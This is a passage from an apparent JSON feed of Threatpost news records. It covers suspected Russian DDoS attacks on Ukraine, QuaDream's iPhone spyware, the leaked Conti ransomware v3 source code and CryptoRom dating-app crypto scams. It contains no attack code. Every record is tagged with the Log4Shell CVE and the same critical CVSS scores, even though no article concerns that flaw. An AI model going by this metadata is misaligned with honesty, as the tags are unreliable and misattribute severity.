\u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. 
Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks designed to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u201d\n\nAnd indeed, in the past two months, Russian advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers, however, noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. 
\u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere is no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. 
or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. 
And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": 
"THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. 
Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one activist living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. 
This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. 
According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. 
According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) is developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. 
Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T22:18:24", "description": "Pro-Ukraine security researcher @ContiLeaks yesterday uploaded a fresher version of Conti ransomware than they had previously [released](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) \u2013 specifically, the source code for Conti Ransomware V3.0 \u2013 to VirusTotal.\n\nContiLeaks [posted a link to the code on Twitter](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUVXkNOpAWYJY6XueO0w9-2BKgfr6VZYiBCbOKrQ0weCr3XPKc3dkrpGerJOdTefZ3TCoZc-2B0Y7hGzuoT1UXn8FeFs-3D56Z8_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfEiW9vFVpxYjIWX781PN8R8JF7KkBzUFBIwqljzaq4hxtg75rgX2ARPJRi6THB9428J9A4pOlZOyjD3lKJYL-2BVII1slbKZCUMI55aI-2Bs2-2BCOD7PeifEREzeKkYV4EenUehhgk-2Fl3eGsFvB7UbpdYjMCB6POU-2FR41MZnlIWqF5tNXhTpfHUJTNdwA-2FigGi-2FE-2BfNo4-2F6iFaT8lbChTpWXOcdI2a279YUV4EJfNws6TH8P4-3D>). The code includes a compiled locker and decryptor, according to [vx-underground](<https://twitter.com/vxunderground/status/1505555084452798469>), which has been archiving the leaks.\n\nThe archive is password-protected, but the password is easy to figure out, according to replies to ContiLeaks\u2019 release.\n\n> source conti v3. 
<https://t.co/1dcvWYpsp7>\n> \n> \u2014 conti leaks (@ContiLeaks) [March 20, 2022](<https://twitter.com/ContiLeaks/status/1505433648023146499?ref_src=twsrc%5Etfw>)\n\nContiLeaks followed up in a few hours by [thumbing their nose](<https://twitter.com/ContiLeaks/status/1505479474208559105>) at the pro-Russia law enforcement that the researcher said is looking for them in the UA \u2013 in other words, in Ukraine.\n\n## Crap Code?\n\nThe code is apparently legitimate.\n\nBleepingComputer [compiled](<https://www.bleepingcomputer.com/news/security/more-conti-ransomware-source-code-leaked-on-twitter-out-of-revenge/>) the newly released source code for Version 3 of Conti ransomware without any issues, successfully creating the gang\u2019s executables for encrypting and decrypting files.\n\nBut just because it works doesn\u2019t mean it\u2019s an improvement, some said.\n\nAfter analyzing the source code, Payload \u2013 a Polish magazine about offensive IT security \u2013 [dismissed](<https://twitter.com/PayloadPl/status/1505576996692238341>) Version 3 as being a \u201cgiant step back\u201d from Version 2 in terms of code quality.\n\nMaybe the changes between versions were done by a flunky dev, Payload [suggested](<https://twitter.com/PayloadPl/status/1505576996692238341>) in its response to [vx-underground](<https://twitter.com/vxunderground/status/1505555084452798469>). \u201cWe analyzed it. There is [\u2026] very little improvement, and giant step back in terms of source code quality. Most probably these changes were made by someone else than original developer.\u201d\n\nFor those who are combing through Conti code, you\u2019re better off sticking with the \u201ccleaner\u201d 2.0, Payload [suggested](<https://twitter.com/PayloadPl/status/1505577765592088589>). 
\u201cBut definitely: if anyone wants to learn anything from this code, please move to Conti 2.0, it\u2019s a lot cleaner and overall better to start with,\u201d Payload said.\n\nRoss Williams, director of digital forensics and incident response (DFIR) at managed detection and response (MDR) services provider CRITICALSTART, told Threatpost on Monday that from a DFIR perspective, these leaks give security professionals and responders \u201cinsight into the gang\u2019s tactics, techniques and procedures as well as indicators of compromise.\u201d The information enables them \u201cto identify a breach or infection more quickly and to thereby slow the spread of ransomware,\u201d Williams said via email.\n\nIt also gives anyone with the motivation and skillset to penetrate a network the tools they need to create their own ransomware gang: The criminally inclined can just use the Conti software along with its training manuals, which were also leaked, noted BreachQuest Head of Product Marco Figueroa.\n\nWith all this access to Conti code, tools and tactics, a hit from \u201cConti\u201d could be close to a hit from \u201cyour guess is as good as mine.\u201d\n\n\u201cI believe the only way to verify that a victim was hit with \u2018Sterns Conti gang\u2019 is by tracking the payment to bitcoin addresses,\u201d Figueroa said. \u201cStern\u201d is a reference to the name used by one of the Conti group\u2019s top managers.\n\n## The Conti Gutting Continues\n\nThis is just the latest in a series of leaks following ContiLeaks\u2019 promise to eviscerate the Conti group \u2013 a promise of revenge that followed Conti\u2019s having[ pledged support](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) for the Russian government over its invasion of Ukraine.\n\nContiLeaks\u2019 earlier spills included an older version of Conti ransomware source code \u2013 one that dated to Jan. 25, 2021. 
Version 3.0 \u2013 the one released on Sunday \u2013 is over a year newer.\n\nIn their earlier leaks, ContiLeaks has also divulged [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for TrickBot[ malware](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>), a decryptor and the gang\u2019s administrative panels, among other core secrets.\n\nThe leaks \u2013 an act of revenge wrought upon the cybercrooks who\u2019ve sided with Russia in the war (one among the [thousand cuts](<http://vx-underground>) that have been bleeding Russia as cybercrooks take sides) \u2013 have also included nearly 170,000 chat conversations between the Conti ransomware gang members, covering more than a year from January 2021 through February 2022.\n\nIt\u2019s a treasure trove that researchers have spent weeks poring over, discovering the inner workings of the extortionists\u2019 dark business, its top brass and far more.\n\nFor example, a clear picture of Conti company culture has arisen from the leaks. For one thing, it\u2019s run like a legit high-tech company, offering bonuses, employee-of-the-month and other such benefits, [researchers say](<https://threatpost.com/staff-think-conti-group-legit-employer-podcast/178903/>). Chat logs also have shown that bored top management have mulled working on [something new](<https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/>): say, Conti\u2019s own [altcoin](<https://time.com/nextadvisor/investing/cryptocurrency/altcoins/>) alternative to Bitcoin.\n\n## New Conti Affiliate Discovered\n\nIn related news, on Monday, eSentire\u2019s Threat Research Unit (TRU) published a [report](<https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire>) about a new Conti affiliate group. 
The report details new accounts, specific IP addresses, domain names and Protonmail email accounts linked to the affiliate, Indicators of Compromise that organizations should address immediately, an overview of attack vectors, and how the affiliate is \u2013 [like so many criminals](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 abusing the Cobalt Strike intrusion framework for attack purposes.\n\neSentire\u2019s report details one such Cobalt Strike incident, nicknamed ShadowBeacon, during which the Cobalt beacons were being deployed from the domain controllers via[ PsExec](<https://attack.mitre.org/software/S0029/>): a legitimate admin tool used for remotely executing binaries.\n\nTogether with BreakPoint Labs (BPL), TRU observed threat actors leveraging the Cobalt Strike infrastructure to attack seven different U.S. companies between 2021 and 2022. According to eSentire, victims included companies in the financial, environmental, legal and charitable sectors.\n\n\u201cThe Windows logs revealed that the threat actor had been able to register their own virtual machine on the victim organization\u2019s network,\u201d the report noted, \u201cusing it as a pivot to their actual, exterior [command-and-control, aka C2, server].\u201d\n\n## Data in Motion Most at Risk in Ransomware Attacks\n\nTo protect from ransomware attacks, Rajiv Pimplaskar, CEO of the VPN company[ Dispersive Holdings,](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUYkvijxYgCuvS2t47ncWcFI-3DcUId_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTfEiW9vFVpxYjIWX781PN8R8JF7KkBzUFBIwqljzaq4hxtg75rgX2ARPJRi6THB9428J9A4pOlZOyjD3lKJYL-2BVCndvSRmk2vKWr2-2F8H36B3qEsvT22-2F665K25o-2BVXN1qn5eeU7TT9vD04P7Kw7dIvT5JGPaQzxYTKwanc-2FCHWfjhtFMP-2BfZgtBLP89vt-2FKVwsmaXd0tyvut19vHQbkEU8JV1jGJ0sOCb4kehgN52J1Ds-3D>) told Threatpost on Monday that organizations should look beyond protecting 
data at rest: the data that\u2019s at risk of getting paralyzed in a ransomware attack. \u201cInformation is most vulnerable for a data breach or malware infection\u201d when it\u2019s in motion, the CEO cautioned.\n\n\u201cNetwork resources are prime targets for Ransomware as a Service (RaaS) actors as they can be ideal vectors for insider threats, code and injection attacks, Man In The Middle (MITM), privilege escalation as well as lateral movement,\u201d Pimplaskar said via email.\n\nPimplaskar suggested that, beyond establishing proper access control and device posture checking to prevent unauthorized access, \u201cnetwork security must also be bolstered with advanced capabilities such as managed attribution and active data multi-pathing. These capabilities obfuscate network soft targets as well as keep data secure from hostile detection and interception.\u201d\n\n032122 14:90 UPDATE: Added input from Ross Williams.\n\n032122 16:43 UPDATE: Added input from Marco Figueroa.\n\n032122 18:05 Corrected explanation of UA: It is, in fact, the two-letter acronym for Ukraine.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T17:48:51", "type": "threatpost", "title": "Conti Ransomware V. 3, Including Decryptor, Leaked", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T17:48:51", "id": "THREATPOST:D240DF7FEF328139784DBE743FF84E9B", "href": "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with 
crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. 
is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. 
I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of 